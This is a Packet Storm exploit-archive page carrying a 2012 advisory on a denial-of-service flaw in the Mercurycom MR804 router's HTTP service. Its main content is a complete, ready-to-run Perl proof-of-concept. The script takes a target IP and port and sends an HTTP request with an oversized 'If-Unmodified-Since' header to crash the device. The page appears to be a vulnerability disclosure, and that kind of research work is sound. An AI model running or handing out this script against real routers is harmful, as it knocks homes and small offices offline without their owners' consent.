exploit the possibilities

Mercurycom MR804 Router Denial Of Service

Mercurycom MR804 Router Denial Of Service
Posted Feb 22, 2012
Authored by demonalex

Mercurycom MR804 Router version 3.8.1 Build 101220 Rel.53006nB suffers from a denial of service vulnerability when fed multiple HTTP headers.

tags | exploit, web, denial of service
MD5 | ccff62db643c371d665060ad46a55c72

Mercurycom MR804 Router Denial Of Service

Change Mirror Download
Title: Mercurycom MR804 Router -  Multiple HTTP Header Fields Denial Of Service Vulnerability

Product : Mercurycom MR804 Router

Hardware Version : MR804 v8.0 081C3113

Software Version : 3.8.1 Build 101220 Rel.53006nB

Vendor: http://www.mercurycom.com.cn/

Class: Boundary Condition Error

CVE:

Remote: Yes

Local: No

Published: 2012-02-21

Updated:

Impact : Medium (CVSS2 Base : 6.1, AV:A/AC:L/Au:N/C:N/I:N/A:C)

Bug Description :
Mercurycom router are commonly used for internet connectivity for home or small office needs. (http://www.mercurycom.com.cn/Product/list)
Mercurycom MR804 Router contains any denial of service vulnerability about HTTP Header Fields(Such as If-Modified-Since, If-None-Match,
If-Unmodified-Since, etc...) in its HTTP service.

POC:
#-------------------------------------------------------------
#!/usr/bin/perl -w
use Socket;
$|=1;
print '*********************************'."\n";
print '* mercurycom MR804 v8.0 DoS PoC *'."\n";
print '* writed by demonalex@163.com *'."\n";
print '*********************************'."\n";
$evil='A'x4097;
$test_ip=shift; #target ip
$test_port=shift; #target port
if(!defined($test_ip) || !defined($test_port)){
die "usage : $0 target_ip target_port\n";
}
$test_payload=
"GET / HTTP/1.0\r\n".
"Accept: */*\r\n".
"Accept-Language: zh-cn\r\n".
"UA-CPU: x86\r\n".
"If-Unmodified-Since: ".$evil."\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".
"Host: ".$test_ip."\r\n".
"Connection: Keep-Alive"."\r\n\r\n";
$test_target=inet_aton($test_ip);
$test_target=sockaddr_in($test_port, $test_target);
socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!\n";
connect(SOCK, $test_target) || die "cannot connect the target!\n";
send(SOCK, $test_payload, 0) || die "cannot send the payload!\n";
#recv(SOCK, $test_payload, 100, 0);
close(SOCK);
print "done!\n";
exit(1);
#-------------------------------------------------------------

Credits : This vulnerability was discovered by demonalex@163.com
mail: demonalex@163.com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    14 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close